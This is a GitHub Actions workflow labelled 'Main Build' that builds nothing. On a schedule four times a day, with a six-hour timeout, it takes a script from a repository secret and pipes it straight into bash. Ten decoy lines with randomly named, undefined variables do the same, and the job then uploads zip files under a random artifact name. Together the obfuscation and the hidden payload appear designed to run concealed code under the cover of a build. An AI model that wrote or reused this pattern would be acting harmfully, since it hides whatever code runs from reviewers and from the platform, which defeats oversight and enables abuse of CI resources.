name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '52 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          xl7144: ${{ secrets.xl7144 }}
        run: |
          printf '%s' "$xl7144" | jq -r .nqo77891 | /bin/bash
          printf '%s' "$c086" | jq -r .cso99 | /bin/bash
          echo $aq6 | jq -r .ov73477 | /bin/bash
          printf '%s' "$eja92759" | jq -r .fvzxn67 | /bin/bash
          printf '%s' "$icgg5499" | jq -r .qt82 | /bin/bash
          printf '%s' "$c00" | jq -r .e86 | /bin/bash
          echo $ofpxf7568 | jq -r .o06614 | /bin/bash
          echo $s8 | jq -r .toul90727 | /bin/bash
          echo $kb093 | jq -r .pofg6943 | /bin/bash
          echo $akz79028 | jq -r .i3626 | /bin/bash
          printf '%s' "$kmgs4" | jq -r .f4 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 2KmISmJO
          path: "*.zip"
          retention-days: 1
